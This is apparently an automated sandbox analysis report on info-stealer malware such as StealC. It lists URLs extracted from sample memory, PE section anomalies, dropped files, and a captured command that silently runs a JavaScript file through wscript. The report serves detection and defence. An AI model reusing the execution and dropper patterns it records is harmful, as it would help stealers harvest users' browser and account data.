Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2976296155.0000000000C51000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/F
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2976296155.0000000000C51000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2976296155.0000000000C51000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900f
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: new_v8.exe, 0000001E.00000003.3046539307.0000000003D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: new_v8.exe, 0000001E.00000003.3046539307.0000000003D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: stealc_default2.exe, 00000007.00000003.3075321770.000000002D22B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: stealc_default2.exe, 00000007.00000002.3140672714.0000000027170000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3060297039.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3076312895.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3074856465.0000000000CD8000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3076783994.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3074732448.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3060630671.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3758849726.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3783337411.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.4145121508.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: splwow64.exe, 0000000B.00000003.2833312201.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000002.4852242929.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000003.2889206601.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: stealc_default2.exe, 00000007.00000002.3140672714.0000000027170000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3047409910.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3758849726.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3783337411.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.4145121508.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: stealc_default2.exe, 00000007.00000003.2833417786.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3009118498.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3650241712.0000000003665000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3414104883.00000000054FC000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3435080893.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 0000002C.00000003.3525441016.0000000003BCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Jurisdiction.pif, 00000015.00000003.2889206601.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: splwow64.exe, 0000000B.00000003.2833312201.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000002.4852242929.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000003.2889206601.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/06
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: stealc_default2.exe, 00000007.00000003.2833417786.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3009118498.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3650241712.0000000003665000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3414104883.00000000054FC000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3435080893.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 0000002C.00000003.3525441016.0000000003BCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: new_v8.exe, 0000001E.00000003.3046539307.0000000003D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: new_v8.exe, 0000001E.00000003.3046539307.0000000003D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: stealc_default2.exe, 00000007.00000003.3075321770.000000002D22B000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3046539307.0000000003D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: new_v8.exe, 0000001E.00000003.3046539307.0000000003D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: stealc_default2.exe, 00000007.00000003.3075321770.000000002D22B000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3046539307.0000000003D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: stealc_default2.exe, 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: stealc_default2.exe, 00000007.00000003.3075321770.000000002D22B000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3046539307.0000000003D31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

System Summary

.NET source code contains very large array initializations

Source: 32.2.dc753b12e1.exe.1c1b0000.2.raw.unpack, searchX64LPVOIDhierarchy.cs

Large array initialization: GetGuidArrayRestrictedSkipVisibilityChecks: array initializer size 440832

Drops large PE files

Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe

File dump: service123.exe.31.dr 314617856

Jump to dropped file

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .rsrc
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: 3288f0a855.exe.6.dr	Static PE information: section name:
Source: 3288f0a855.exe.6.dr	Static PE information: section name: .rsrc
Source: 3288f0a855.exe.6.dr	Static PE information: section name: .idata
Source: hhnjqu9y[1].exe.6.dr	Static PE information: section name:
Source: hhnjqu9y[1].exe.6.dr	Static PE information: section name:
Source: hhnjqu9y[1].exe.6.dr	Static PE information: section name:
Source: hhnjqu9y.exe.6.dr	Static PE information: section name:
Source: hhnjqu9y.exe.6.dr	Static PE information: section name:
Source: hhnjqu9y.exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: .rsrc
Source: random[2].exe.6.dr	Static PE information: section name: .idata
Source: random[2].exe.6.dr	Static PE information: section name:
Source: efbc18aa93.exe.6.dr	Static PE information: section name:
Source: efbc18aa93.exe.6.dr	Static PE information: section name: .rsrc
Source: efbc18aa93.exe.6.dr	Static PE information: section name: .idata
Source: efbc18aa93.exe.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: 109418c5c3.exe.6.dr	Static PE information: section name:
Source: 109418c5c3.exe.6.dr	Static PE information: section name: .idata
Source: 51a08c3032.exe.6.dr	Static PE information: section name:
Source: 51a08c3032.exe.6.dr	Static PE information: section name: .rsrc
Source: 51a08c3032.exe.6.dr	Static PE information: section name: .idata
Source: 51a08c3032.exe.6.dr	Static PE information: section name:
Source: 2bbdb01603.exe.6.dr	Static PE information: section name:
Source: 2bbdb01603.exe.6.dr	Static PE information: section name: .idata
Source: new_v8[1].exe.6.dr	Static PE information: section name: .vmp+
Source: new_v8[1].exe.6.dr	Static PE information: section name: .vmp+
Source: new_v8[1].exe.6.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.6.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.6.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.6.dr	Static PE information: section name: .vmp+
Source: YJJA1RDG0PY87AD1W2WB98M4U9.exe.30.dr	Static PE information: section name:
Source: YJJA1RDG0PY87AD1W2WB98M4U9.exe.30.dr	Static PE information: section name: .idata

PE file has a writeable .text section

Source: stealc_default2[1].exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: stealc_default2.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C12B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	7_2_6C12B700
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C12B8C0 rand_s,NtQueryVirtualMemory,	7_2_6C12B8C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C12B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	7_2_6C12B910
